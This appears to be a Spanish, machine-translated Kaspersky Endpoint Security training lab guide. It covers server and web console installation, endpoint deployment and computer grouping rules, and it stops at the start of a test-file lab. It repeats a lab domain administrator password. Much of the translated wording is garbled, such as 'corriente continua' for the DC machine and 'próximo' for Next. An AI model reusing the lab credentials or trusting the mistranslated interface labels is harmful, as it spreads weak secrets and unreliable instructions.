Está en la página 1de 145

Kaspersky Entrenamiento tecnico

KL 002.11.1

Kaspersky
Endpoint Security and
Management

Guía de laboratorio
Kaspersky Lab
www.kaspersky.com
Tabla de contenido

Laboratorio 1. Cómo instalar Kaspersky Security Center ......................................... .................................................. .............. 3

Tarea A: Instalar el servidor de administración de Kaspersky Security Center ........................................ ........................... 3


Tarea B: Instalar la consola web de Kaspersky Security Center ....................................... ....................................... 7
Tarea C: continúe con el Asistente de inicio rápido para configurar el servidor de administración de Kaspersky Security Center
... ................................................... ...................................................................................................................... . 10

Laboratorio 2. Cómo implementar Kaspersky Endpoint Security ......................................... .................................................. ....... 17

Tarea A: Instalar Kaspersky Endpoint Security para Windows en una estación de trabajo y el Servidor de administración de Kaspersky Security Center
................................ .................................................. .................................................. ...... 18
Tarea B: crear un paquete de instalación independiente para Kaspersky Endpoint Security ...................................... .... 22
Tarea C: Instalar un paquete independiente de Kaspersky Endpoint Security para Windows en una computadora portátil .................. 24
Tarea D: Estudiar los resultados del despliegue de protección en la red ...................................... .................................. 25

Laboratorio 3. Cómo crear una estructura para las computadoras administradas ...................................... ............................................... 26

Tarea A: Crear grupos para estaciones de trabajo, portátiles y servidores ...................................... .................................. 26
Tarea B: mover las computadoras en grupos por reglas ......................................... .................................................. .......... 28

Práctica de laboratorio 4. Cómo probar la protección contra amenazas de archivos ......................................... .................................................. ........................ 34

Asegúrese de que Kaspersky Endpoint Security pueda detectar archivos maliciosos que se ejecutan en el subsistema de Windows para Linux
................................. .................................................. .................................................. ............................... 34

Laboratorio 5. Cómo configurar la Protección contra amenazas de correo ......................................... .................................................. ............. 36

Tarea A: envíe un mensaje con un archivo ejecutable ........................................ .................................................. ........ 36


Tarea B: Editar el filtro de archivos adjuntos ........................................... .................................................. ........................... 37
Tarea C: asegúrese de que Mail Threat Protection ya no edita archivos adjuntos .................................... ...... 39

Práctica de laboratorio 6. Cómo probar la Protección contra amenazas web ......................................... .................................................. ....................... 41

Tarea A: asegúrese de que la Protección contra amenazas web analice el tráfico https de forma predeterminada .................................... ................. 41

Tarea B: desactivar el análisis de tráfico cifrado para la aplicación PowerShell ...................................... ................. 41
Tarea C: asegúrese de que Web Threat Protection permita a la aplicación confiable PowerShell descargar el virus de prueba a través de https
............................. .................................................. .................................................. .................... 43

Laboratorio 7. Cómo probar la protección de carpetas de red contra ransomware ...................................... ................................. 44

Tarea A: simular una infección de ransomware ........................................... .................................................. ............... 44


Tarea B: Verifique cómo reaccionó el componente de detección de comportamiento en la máquina Tom-Laptop ........................... 48
Tarea C: permitir el cifrado dentro de las carpetas compartidas de red y configurar exclusiones para dispositivos de red confiables 49 Tarea D: asegurarse de que las
exclusiones para dispositivos de red confiables funcionen correctamente .................... .............................. 50

Laboratorio 8. Cómo verificar el estado de prevención de exploits ........................................ .................................................. ........... 51

Tarea A: simule un ataque de piratas informáticos aprovechando una vulnerabilidad en PowerShell y obtenga acceso a una computadora remota
... ................................................... ...................................................................................................................... . 51
Tarea B: deshabilitar la mayoría de los componentes de protección ......................................... .................................................. 54
Tarea C: Probar la protección contra exploits ........................................... .................................................. ................. 55

Laboratorio 9. Cómo probar la protección contra amenazas sin archivos ........................................ .................................................. ........ 56

Asegúrese de que AMSI detecte amenazas sin archivos ........................................... .................................................. ........... 57

Laboratorio 10. Mejorar la protección de las estaciones de trabajo contra ransomware ......................................... ........................................ 58

Tarea A: simular una infección de ransomware ........................................... .................................................. ............... 58


Tarea B: Prohibir que todos los programas, excepto los de confianza, editen y eliminen documentos .................................... 59
Tarea C: Configurar los eventos de Host Intrusion Prevention para que se almacenen en el Servidor de Administración ....................... 63
Tarea D: simular cifrar un documento y verificar el resultado ....................................... ..................................... 66

Laboratorio 11. Cómo probar la Protección contra amenazas de red ......................................... .................................................. .............. 67

Tarea A: Imitar un ataque de red desde Kali en Alex-Desktop ..................................... ......................................... 67


Tarea B: Estudiar el informe de ataque a la red .......................................... .................................................. ................. 68
Tarea C: Desbloquear la computadora Kali ........................................... .................................................. ........................ 71
Tarea D: Configurar exclusiones en las propiedades de Protección contra amenazas de red ...................................... ............. 73
Tarea E: Imite un ataque de Kali en Alex-Desktop y estudie los resultados .................................. ...................... 74
L–2 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

Laboratorio 12. Cómo configurar exclusiones de defensa personal ....................................... .................................................. .... 75

Tarea A: Intente interactuar con Kaspersky Endpoint Security a través de la Asistencia remota de Windows ............................... 75
Tarea B: permitir que la Asistencia remota de Windows interactúe con Kaspersky Endpoint Security ............................... 79
Tarea C: Abra el informe local de Kaspersky Endpoint Security en una sesión de Asistencia remota de Windows ......... 80

Laboratorio 13. Cómo configurar la protección con contraseña .......................................... .................................................. .............. 81

Tarea A: busque una computadora donde la protección esté desactivada ........................................ .................................................. ....... 81
Tarea B: Proteger Kaspersky Endpoint Security con una contraseña ........................................ ................................... 82
Tarea C: asegúrese de que Kaspersky Endpoint Security esté protegido con contraseña ..................................... ................ 85
Tarea D: establecer una contraseña para la desinstalación del Agente de red ........................................ ........................................... 86

Laboratorio 14. Cómo configurar el control de aplicaciones .......................................... .................................................. .............. 88

Tarea A: crear una categoría para todos los navegadores web excepto Internet Explorer ..................................... ..................... 89
Tarea B: Prohibir a los usuarios iniciar cualquier navegador excepto Internet Explorer .................................... ....... 91
Tarea C: Inicie Mozilla Firefox e Internet Explorer ......................................... .................................................. 93

Laboratorio 15. Cómo bloquear el inicio de aplicaciones desconocidas en la red ..................................... ..................................... 95

Tarea A: crear una categoría de aplicación que prohíba iniciar archivos desconocidos ...................................... .............. 95
Tarea B: cambiar la política para prohibir a todos los usuarios iniciar archivos desconocidos .................................. ........... 98
Tarea C: asegúrese de que la configuración funcione correctamente ........................................ .................................................. 100

Laboratorio 16. Cómo bloquear unidades flash USB ......................................... .................................................. ......................... 102

Tarea A: Configurar el bloqueo de unidades flash USB .......................................... .................................................. ........ 102
Tarea B: Prueba de bloqueo de unidades flash USB .......................................... .................................................. ................. 105
Tarea C: Recibir una solicitud del usuario ......................................... .................................................. ................. 106

Laboratorio 17. Cómo configurar permisos granulares para unidades flash USB ...................................... ............................... 107

Tarea A: prohibir a todos los usuarios escribir archivos en unidades flash USB ..................................... ................................. 107
Tarea B: Permitir a los usuarios del dominio escribir archivos en unidades flash USB de confianza .................................... .......................... 110

Laboratorio 18. Cómo configurar el control de acceso web ......................................... .................................................. ............... 115

Tarea A: crear una regla para bloquear el acceso a los sitios web de intercambio de criptomonedas ..................................... ................ 116
Tarea B: probar si el acceso a los sitios web de intercambio de criptomonedas está bloqueado ...................................... ............ 119
Tarea C: Consultar informes en Kaspersky Security Center ......................................... ............................................. 120

Laboratorio 19. Cómo configurar el Control Adaptativo de Anomalías ......................................... .................................................. .. 121

Tarea A: Configurar macros y scripts de bloqueo en documentos de Office ....................................... .......................... 121
Tarea B: asegúrese de que el Control de anomalía adaptativa bloquea una macro maliciosa ..................................... ............ 123
Tarea C: Configurar Prevención de exploits para bloquear macros maliciosas ........................................ ............................ 125

Laboratorio 20. Cómo configurar el tablero .......................................... .................................................. ...................... 129

Tarea A: Agregar nuevos widgets al tablero ......................................... .................................................. ............. 130


Tarea B: Eliminar y reorganizar widgets ........................................... .................................................. .................. 132

Laboratorio 21. Cómo configurar herramientas de mantenimiento .......................................... .................................................. ................ 134

Tarea A: Eliminar informes innecesarios ............................................ .................................................. ..................... 134


Tarea B: Crear un informe semanal sobre computadoras infectadas ........................................ ......................................... 135
Tarea C: Configure los informes más importantes para enviar por correo electrónico ....................................... ..................................... 137

Laboratorio 22. Cómo recopilar información de diagnóstico .......................................... .................................................. ............. 140

Tarea A: recopilar registros de seguimiento de una computadora ......................................... .................................................. ............ 140
L–3
Laboratorio 1.

Cómo instalar Kaspersky Security Center

Laboratorio 1.

Cómo instalar Kaspersky Security Center

Guión. Debe proteger menos de 100 computadoras en ABC Inc. con Kaspersky Endpoint Security for Business. Un Servidor de Administración y la edición
Express de Microsoft SQL Server son suficientes para administrar la protección dentro de dicha red. Instale el Servidor de administración de Kaspersky Security
Center en una computadora dedicada que ejecute Windows Server 2016. El servidor Microsoft SQL se ha instalado previamente en la máquina virtual.

Contenido. En este laboratorio, haremos lo siguiente:

1) Instale el servidor de administración de Kaspersky Security Center


2) Instale la consola web de Kaspersky Security Center
3) Continúe con el Asistente de inicio rápido para configurar el servidor de administración de Kaspersky Security Center

Tarea A: Instale el servidor de administración de Kaspersky Security Center

Instale el Servidor de administración de Kaspersky Security Center con la configuración predeterminada.

La tarea se realiza en Centro de Seguridad.


los corriente continua La computadora debe estar encendida.

1) Inicie el instalador de Kaspersky Security Center (está en el


escritorio)

2) En la página de bienvenida del asistente, haga clic en próximo

3) En la página siguiente, asegúrese de que la versión requerida de


. NET Framework está instalado y haga clic próximo
L–4 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

4) Acepte el Acuerdo de licencia y la Política de privacidad

5. Haga clic en próximo

6. Seleccione el Estándar tipo de instalación y haga clic próximo

7) Desactive la casilla de verificación Instalar Kaspersky Security Center 11

Consola web Instalaremos la consola web más tarde usando su propio asistente de
instalación
L-5
Laboratorio 1.

Cómo instalar Kaspersky Security Center

8) Mantener la opción Menos de 100 dispositivos en red seleccionado


y haga clic próximo

9. Seleccione Microsoft SQL Server y haga clic próximo

10. Haga clic en Vistazo


L–6 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

11. Seleccione el CENTRO DE SEGURIDAD \ SQLEXPRESS servidor y


hacer clic Okay

12) Para proceder con la instalación de Kaspersky Security


Centrar, hacer clic próximo

13. Seleccione Modo de autenticación de Microsoft Windows y haga clic


próximo
L–7
Laboratorio 1.

Cómo instalar Kaspersky Security Center

14) Para comenzar la instalación, haga clic en Instalar en pc

15. Hacer no seleccione para iniciar la Consola de administración y haga clic en

Terminar para cerrar el mago

Tarea B: Instale la consola web de Kaspersky Security Center

Kaspersky Security Center 11 presenta una nueva consola web de administración. Se implementa como un componente independiente que tiene una distribución separada.

La tarea se realiza en Centro de Seguridad.


los corriente continua La computadora debe estar encendida.

dieciséis. Inicie el instalador de la consola web de Kaspersky Security Center (pregunte

el instructor donde se encuentra la distribución)

17) Seleccione un idioma para el asistente de instalación


L–8 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

18) En la página de bienvenida del asistente, haga clic en próximo

19) Acepte el Acuerdo de licencia y haga clic próximo

20) No cambie la carpeta de destino.

21. Haga clic en próximo

22) Especifique la dirección de conexión: 127.0.0.1

23) No cambie el puerto

24. Haga clic en Prueba


L–9
Laboratorio 1.

Cómo instalar Kaspersky Security Center

25) Asegúrese de que el puerto 8080 sea accesible en 127.0.0.1

26. Haga clic en Okay y próximo

27) Deje esta configuración sin cambios

28. Haga clic en próximo

29. Seleccione la opción Generar nuevo certificado

30. Haga clic en próximo

31. Asegúrese de que CENTRO DE SEGURIDAD se especifica en la lista


de servidores de administración confiables

32. Haga clic próximo para proceder con la instalación


L-10 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

33) Para comenzar la instalación, haga clic en Instalar en pc

34) Cierre la configuración de la consola web de Kaspersky Security Center 11


Asistente: haga clic Terminar

Tarea C: Continúe con el Asistente de inicio rápido para configurar el servidor de administración de
Kaspersky Security Center

Conéctese al Servidor de Administración utilizando la Consola web de Kaspersky Security Center y continúe con el Asistente de inicio rápido. Agrega un código de activación.
Configure las notificaciones a administrador@abc.lab a través del servidor SMTP 10.28.0.10. Acepte el acuerdo de KSN. Descargar actualizaciones de firmas. No inicie el
Asistente de instalación remota. Habilite la distribución automática de la licencia.
L – 11
Laboratorio 1.

Cómo instalar Kaspersky Security Center

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Alex-Desktop, y Tom-Laptop Las máquinas deben estar encendidas.

35. Inicie Google


Navegador Chrome. En la barra de

direcciones, escriba

https://127.0.0.1:8080

36. Haga clic en Avanzado

37. Haga clic en el enlace Continuar

a 127.0.0.1 (inseguro)

38. Ingrese el nombre de usuario

abc \ administrador y
contraseña Ka5per5Ky

39. Haga clic en el Iniciar sesión botón

40. Omita el tutorial. Hacer clic


X para cerrarlo
L – 12 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

41. En la página de bienvenida de


el asistente, haga clic próximo

42. No usaremos un proxy


servidor. Hacer clic próximo

43. No esperes a que


asistente para descargar

actualizaciones, haga clic en próximo


L – 13
Laboratorio 1.

Cómo instalar Kaspersky Security Center

44. Para activar el


aplicación, seleccione Agregar código

de activación

45. Pregúntele al entrenador dónde

encuentra el código de activación

46. ​Ingrese la activación


código en el campo

47. Haga clic Enviar

48. Asegúrese de que 3 llaves


se han agregado al
repositorio

49. Haga clic próximo

50. Haga clic Añadir para instalar el

complemento de gestión de

Kaspersky Endpoint
Security 11.1
L-14 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

51. Seleccione el inglés KSC


Complemento de consola web

para KES Windows

52. Haga clic Instalar complemento

53. Asegúrese de que el


complemento de Kaspersky
Endpoint Security 11.1
ha sido agregado
exitosamente a la lista

54. Haga clic en Okay


L-15
Laboratorio 1.

Cómo instalar Kaspersky Security Center

55. Haga clic en próximo

56. Acepta el KSN


declaración: Seleccione Acepto
usar Kaspersky Security Network y
haga clic próximo

57. Haga clic Crear

58. Espere el inicio rápido


Asistente para crear políticas y
tareas principales
L – 16 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

59. Si el Encuesta de red


aparece la página, haga clic en

próximo

60. Especifique el destinatario


para notificaciones por correo

electrónico: en el Dirección de correo electrónico

cuadro, ingrese

administrador@abc.lab ,
y para el Servidor SMTP, tipo
10.28.0.10

61. Haz clic en el botón Enviar


mensaje de prueba para verificar si
la configuración es correcta

62. Asegúrese de que haya


No mensaje de error y haga clic próximo

63. Borrar el comienzo

Asistente de implementación de

protección casilla de verificación y haga

clic Terminar
L-17
Laboratorio 2.

Cómo implementar Kaspersky Endpoint Security

64. Cambiar a Operaciones |


Licencia

65. Seleccione la clave para

estaciones de trabajo y

servidores

66. Haga clic en el nombre de la licencia

para abrir las


propiedades clave

67. Seleccionar para Implementar clave

automáticamente

68. Haga clic Salvar

Conclusión

Instaló el Servidor de administración, la Consola web de Kaspersky Security Center y el complemento para Kaspersky Endpoint Security. Además, completó el
Asistente de inicio rápido: creó las tareas y políticas predeterminadas, aceptó el acuerdo de KSN, configuró notificaciones para el administrador y habilitó la
distribución automática para la clave.

Otros laboratorios le enseñarán cómo instalar Kaspersky Endpoint Security and Network Agent.

Laboratorio 2.

Cómo implementar Kaspersky Endpoint Security

Guión. Debe instalar Kaspersky Endpoint Security en las computadoras de la red. Ya ha instalado el Servidor de administración de Kaspersky Security
Center. Ahora, use el Asistente de instalación remota para instalar Kaspersky Endpoint Security and Network Agent en las computadoras descubiertas por
el Servidor de Administración.

Contenido. En este laboratorio, haremos lo siguiente:

1) Instale Kaspersky Endpoint Security para Windows en una estación de trabajo y el Servidor de administración de Kaspersky Security Center

2) Instale Kaspersky Endpoint Security para Windows utilizando un paquete independiente en una computadora portátil

3) Estudie los resultados de la instalación.


L – 18 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

Tarea A: Instale Kaspersky Endpoint Security para Windows en una estación de trabajo y el Servidor de
administración de Kaspersky Security Center

Ejecute el Asistente de instalación remota y seleccione el paquete de Kaspersky Endpoint Security. Para poder acceder a las computadoras, especifique la cuenta de
administrador de dominio ABC \ Administrador y contraseña Ka5per5Ky. Deje las otras configuraciones sin cambios.

Espere a que la tarea instale las aplicaciones. Si la tarea le solicita que reinicie una computadora, actúe como usuario y reiníciela.

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Alex-Desktop, y Tom-Laptop Las máquinas deben estar encendidas.

1. Cambiar a Descubrimiento y

Despliegue

2. En el Despliegue y
Asignación menú desplegable,

seleccione Asistente de

implementación de protección

3. Seleccione Kaspersky

Endpoint Security para


Windows (11.0.0) en la lista de
paquetes de instalación

4. Haga clic en próximo

5. Seleccione No agregue clave

al paquete de instalación

6. Haga clic en próximo

7. Seleccione Kaspersky

Security Center 11
Agente de red

8. Haga clic en próximo


L – 19
Laboratorio 2.

Cómo implementar Kaspersky Endpoint Security

9. Elige Seleccionar dispositivos

para instalacion

10. Expande el Gestionado


dispositivos lista. Encuentra y

selecciona el Centro de Seguridad computadora

11. Expande el No asignado


dispositivos lista. Encuentra y

selecciona el Alex-Desktop

computadora

12. Sin cambiar el


parámetros de copia del paquete,

haga clic en próximo

13. Haga clic en próximo sin

cambiar los parámetros de


reinicio
L-20 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

14. Acepta desinstalar


aplicaciones incompatibles y
haga clic
próximo

15. Seleccione para mover

computadoras a la
Dispositivos gestionados

grupo después de la instalación


y haga clic
próximo

16. Para especificar el nombre y


contraseña de un
administrador, seleccione
Cuenta requerida
(instalación sin Agente de
red)

17. Para especificar una cuenta,


hacer clic Añadir

18. Escriba el
abc \ administrador
nombre de usuario Ka5per5Ky

contraseña y haga clic en Okay

19. Asegúrese de que el


abc \ administrador
cuenta ha sido agregada y haga clic
próximo
L – 21
Laboratorio 2.

Cómo implementar Kaspersky Endpoint Security

20. Seleccione la casilla de verificación

Ejecute la tarea cuando se


complete el asistente

21. Haga clic en Okay

22. Abra el Dispositivos |


Tareas lengüeta

23. Seleccione el Remoto


instalación de Kaspersky
Endpoint Security para
Windows
tarea

24. Para consultar su progreso,


hacer clic Resultado

25. Asegúrese de que la tarea


se ejecuta en dos
computadoras

26. Espera la notificación


que las computadoras deben
reiniciarse para completar la
tarea con éxito

27. Cambiar a Alex-Desktop

28. Inicie sesión en el abc \ Alex cuenta, contraseña Ka5per5Ky

29) Reinicie la computadora: haga clic en Reiniciar botón en el mensaje


ventana

30) Después de que arranque, inicie sesión en abc \ Alex cuenta con el
contraseña Ka5per5Ky
L – 22 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

31) Para completar la instalación de Kaspersky Endpoint Security en


el servidor del Centro de seguridad, reiniciar la máquina.

32) Cuando la computadora se inicie nuevamente, inicie sesión en

abc \ Administrador cuenta con la contraseña Ka5per5Ky

Tarea B: Cree un paquete de instalación independiente para Kaspersky Endpoint Security

Abra la lista de paquetes de instalación. Seleccione el paquete de Kaspersky Endpoint Security. Inicie el asistente de creación de paquetes independiente. Agregue el
Agente de red al paquete de instalación y seleccione el grupo al que se moverán las computadoras de destino después de la instalación.

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Alex-Desktop, y Tom-Laptop Las máquinas deben estar encendidas.

33. Inicie sesión en el

abc \ Administrador
cuenta con la contraseña Ka5per5Ky

34. Ejecute el MMC


Consola de Administracion

35. Expande el Avanzado |


Instalación remota
nodo

36. Seleccione el Instalación


paquetes nodo

37. Seleccione la instalación


paquete Kaspersky Endpoint
Security para Windows
(11.1.0)

38. En el panel derecho, haga clic en

el enlace Crear paquete de


instalación independiente
L – 23
Laboratorio 2.

Cómo implementar Kaspersky Endpoint Security

39. Acepta instalar Red Kaspersky Security Center 11


Agente junto con Kaspersky Endpoint Security: haga clic en
próximo

40) Acuerde mover las computadoras protegidas al Dispositivos gestionados


grupo: haga clic en próximo

41) Espera a que el asistente cree el paquete

42) Preste atención a la ruta del archivo del paquete, la necesitará en el


siguiente tarea Hacer clic próximo
L – 24 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

43. Haga clic en Terminar para cerrar el mago

Tarea C: Instale un paquete independiente de Kaspersky Endpoint Security para Windows en una computadora
portátil

Desde la computadora cliente, abra la carpeta KLSHARE en el Servidor de Administración. Encuentre y ejecute el paquete independiente.

La tarea se realiza en Tom-Laptop.


los CORRIENTE CONTINUA, Centro de Seguridad, y Alex-Desktop Las máquinas deben estar encendidas.

44. En el Tom-Laptop máquina, arranque Ventanas


Explorador

45 Abra la carpeta compartida \\ seguridad-


center \ klshare \ PkgInst \

46) Abra la carpeta del paquete independiente que


creaste en la primera tarea

47. Copie el installer.exe presentar al escritorio y


iniciarlo

48. En el Control de cuentas del usuario ventana, confirmar


ejecutar el archivo con privilegios administrativos: haga clic en si
L – 25
Laboratorio 2.

Cómo implementar Kaspersky Endpoint Security

49) Inicie la instalación: haga clic en el botón correspondiente

50 Espere a que se complete la instalación y haga clic en


Cerrar para salir de la ventana de resultados

Tarea D: Estudie los resultados del despliegue de protección en la red.

Estudie los resultados de la tarea de instalación. Asegúrese de que las computadoras se hayan movido al Dispositivos gestionados grupo. Asegúrese de que Network Agent 11 y
Kaspersky Endpoint Security 11.1 estén instalados en las computadoras.

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Alex-Desktop, y Tom-Laptop Las máquinas deben estar encendidas.

51. Abra Kaspersky


Consola web del centro de
seguridad

52. Cambie a la
Monitoreo e informes |
Informes
lengüeta

53. Encuentra el Despliegue


informes

54. Seleccione el Kaspersky


Informe de versión de software de

laboratorio

55. Haga clic en Mostrar reporte


L – 26 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

56. Asegúrese de que


muestra tres instancias de
Kaspersky Endpoint Security y
tres instancias de Agente de
red, exactamente el mismo
número que las computadoras
de red

57. Cerrar el informe

Conclusión

Ha instalado Kaspersky Endpoint Security and Network Agent utilizando el asistente de instalación remota y un paquete independiente.

Si un antivirus de otro fabricante está instalado en una computadora, el instalador lo desinstalará y le pedirá que reinicie la máquina.

Si se está ejecutando un firewall en una computadora o no ha especificado una cuenta que tenga permisos administrativos en las máquinas de destino, la instalación
devolverá un error.

Laboratorio 3.

Cómo crear una estructura para las computadoras


administradas

Guión. Ha instalado protección en las computadoras de la red y desea configurarla de manera óptima. Suponiendo que los servidores, las computadoras de escritorio y las computadoras
portátiles necesitan configuraciones diferentes, cree grupos respectivos para ellos y mueva las computadoras allí. Para ahorrar esfuerzo al mover manualmente las computadoras a sus
grupos apropiados, cree reglas de reubicación y configure condiciones basadas en los sistemas operativos y los parámetros de red de las computadoras.

Contenido. En este laboratorio, haremos lo siguiente:

1) Crear grupos para estaciones de trabajo, portátiles y servidores.


2) Mueva las computadoras a los grupos usando reglas

Tarea A: Crear grupos para estaciones de trabajo, portátiles y servidores.

Crear Servidores y Estaciones de trabajo subgrupos en el Dispositivos gestionados envase. Luego crea Escritorios y Laptops
subgrupos dentro del Estaciones de trabajo grupo.
L – 27
Laboratorio 3.

Cómo crear una estructura para las computadoras administradas

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Alex-Desktop, y Tom-Laptop Las máquinas deben estar encendidas.

1. Abra el Dispositivos | Editar


grupos lengüeta

2. Seleccione el grupo
Dispositivos gestionados

3. Para crear un subgrupo,


hacer clic Añadir

4. Escriba Servidores Para el

nombre del grupo y haga clic

Añadir

5. Seleccione el Gestionado

dispositivos grupo

6. Para crear un subgrupo,


hacer clic Añadir

7. Crear otro subgrupo


llamado Estaciones de trabajo
L-28 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

8. Seleccione el

Estaciones de trabajo grupo y haga

clic Añadir

9. Escriba Escritorios Para el


Nombre del grupo

10. Repita los pasos 8,9 para

crear el Laptops
grupo

Tarea B: Mueve las computadoras a grupos por reglas

Abra la lista de reglas en las propiedades de Dispositivos no asignados nodo. Crea una regla para todas las computadoras. Funcionará permanentemente y moverá los
servidores a Servidores grupo. Utilizar el El agente de red se está ejecutando condición y la Versión del sistema operativo condición con el Windows Server 2012 R2 y Windows
Server 2016 valores. Puede encontrar ambas condiciones en el
Aplicaciones lengüeta.

Cree reglas similares que moverán las computadoras al Escritorios y Laptops grupos respectivamente. En vez de Versión del sistema operativo, utilizar el Rango de IP condición
disponible en el Red lengüeta. Para computadoras de escritorio, especifique el rango 10.28.0.100–
10.28.0.199; y para cuadernos, 10.28.0.200–10.28.0.254.

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Alex-Desktop, y Tom-Laptop Las máquinas deben estar encendidas.
L – 29
Laboratorio 3.

Cómo crear una estructura para las computadoras administradas

11. Cambiar a Descubrimiento y

Despliegue

12. En el Despliegue y
Asignación menú desplegable,

seleccione Reglas de movimiento

13. Haga clic en Añadir

14. Tipo Servidores Para el


nombre de la regla

15. Especifique el destino


grupo: en la lista
desplegable, seleccione el
Dispositivos gestionados |

Servidores subgrupo

16. Seleccione el Regla aplicada


continuamente opción

17. Aplicar la regla a todos


ordenadores, claro la casilla de
verificación Mover solo
dispositivos que no pertenecen
a un grupo de administración

18. Seleccione el Habilitar regla

casilla de verificación
L-30 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

19. Abra el Regla


condiciones lengüeta

20. Cambie a la
Aplicaciones lengüeta

21. Especifique que el


Network Agent está instalado:
en la lista desplegable
correspondiente, seleccione si

22. Aplicar la regla a


computadoras con sistemas
operativos de servidor: habilite el Versión
del sistema operativo

parámetro

23. Desplácese por la lista hasta

abajo y pasar a la segunda


página

24. Bajo Operando


versión del sistema, Seleccione

Microsoft Windows 2012 R2 y


Microsoft Windows Server
2016

25. Para guardar la regla, haga clic en

Salvar

26. Haga clic en Añadir para crear un

regla para escritorios


L – 31
Laboratorio 3.

Cómo crear una estructura para las computadoras administradas

27. Tipo Escritorios Para el


nombre de la regla

28. Especifique el destino


grupo: en la lista
desplegable, seleccione el
Dispositivos gestionados |

Estaciones de trabajo |

Escritorios subgrupo

29. Seleccione el Regla aplicada


continuamente opción

30. Aplicar la regla a todos


ordenadores, claro la casilla de
verificación Mover solo
dispositivos que no pertenecen
a un grupo de administración

31. Seleccione el Habilitar regla

casilla de verificación

32. Abra el Regla


condiciones lengüeta

33. Configurar condiciones


para direcciones IP: cambie a Red
lengüeta

34. Aplicar la regla a la


computadoras cuyas direcciones

pertenecen a un intervalo específico:

Seleccione el Rango de IP casilla de

verificación

35. Especifique el rango de IP

10.28.0.100—
10.28.0.199

36. Cambie a la
Aplicaciones lengüeta

37. Especifique que el


Network Agent está instalado:
en la lista desplegable
correspondiente, seleccione si

38. Para guardar la regla, haga clic en

Salvar
L – 32 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

39. Haga clic en Añadir para crear un

regla para cuadernos

40. Tipo Laptops Para el


nombre de la regla

41. Especifique el destino


grupo: en la lista
desplegable, seleccione el
Dispositivos gestionados |

Estaciones de trabajo | Laptops subgrupo

42. Seleccione el Regla aplicada


continuamente opción

43. Desactive la casilla de verificación

Mover solo dispositivos que no


pertenecen a un grupo de
administración

44. Seleccione el Habilitar regla

casilla de verificación

45. Abra el Regla


condiciones lengüeta

46. ​Cambie a la Red


lengüeta

47. Seleccione el Rango de IP

casilla de verificación

48. Especifique el rango de IP

10.28.0.200—
10.28.0.254
L-33
Laboratorio 3.

Cómo crear una estructura para las computadoras administradas

49. Cambie a la
Aplicaciones lengüeta

50. Especifique que el


Network Agent está instalado:
en la lista desplegable
correspondiente, seleccione si

51. Para guardar la regla, haga clic en

Salvar

52. Asegúrese de que haya


cinco reglas de reubicación en la
lista: dos fueron creadas
automáticamente para los
paquetes de instalación y tres
usted

53. Haga clic Dispositivos |

Dispositivos gestionados

54. Haga clic en Dispositivos | Grupos

55. (Opcional) Fijar el grupo


estructura

56. Sobre la estructura del grupo

árbol, expandir Centro de seguridad

| Dispositivos gestionados y

seleccione

Servidores

57. Abra las propiedades de


el Centro de Seguridad
dispositivo
L – 34 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

58. Asegúrese de que el


Centro de Seguridad

la computadora, que ejecuta el


sistema operativo Windows
Server 2016, se ha movido
automáticamente a Servidores grupo

59. De manera similar,


asegúrese de que las otras
computadoras se hayan movido a
sus respectivos grupos

Conclusión

Instaló protección y organizó las computadoras en grupos. La configuración predeterminada está optimizada para un usuario promedio de Kaspersky Endpoint Security. Protegen
de manera confiable las computadoras y minimizan el impacto en el rendimiento. Puede ajustar el equilibrio entre protección y comodidad según sea necesario: refuerce la
protección en algunos aspectos y quizás haga concesiones en otros con el objetivo de mejorar la experiencia del usuario. Otros laboratorios explicarán cómo ajustar la
configuración de protección.

Laboratorio 4.

Cómo probar la protección contra amenazas de archivos

Guión. Instaló Kaspersky Endpoint Security en las computadoras de la red. De forma predeterminada, Kaspersky Endpoint Security es compatible con el Subsistema de Windows
para Linux: es una capa de compatibilidad para ejecutar aplicaciones de Linux en las últimas versiones de Microsoft Windows. En nuestro entorno, el Subsistema de Windows para
Linux se basa en Ubuntu Linux 14.04. El administrador debe iniciar un archivo malicioso de prueba en el Subsistema de Windows para Linux y asegurarse de que Kaspersky
Endpoint Security 11.1 lo detecte y lo elimine.

Contenido. En este laboratorio, haremos lo siguiente:

1) Asegúrese de que Kaspersky Endpoint Security pueda detectar archivos maliciosos que se ejecutan dentro del subsistema de Windows para Linux
2) Consulte los eventos de Protección contra amenazas de archivos

Asegúrese de que Kaspersky Endpoint Security pueda detectar archivos maliciosos que se ejecutan dentro del
subsistema de Windows para Linux

En esta tarea, intentaremos compilar un cargador para eicar.com dentro del Subsistema de Windows para Linux que se ejecuta en Windows 10.
L – 35
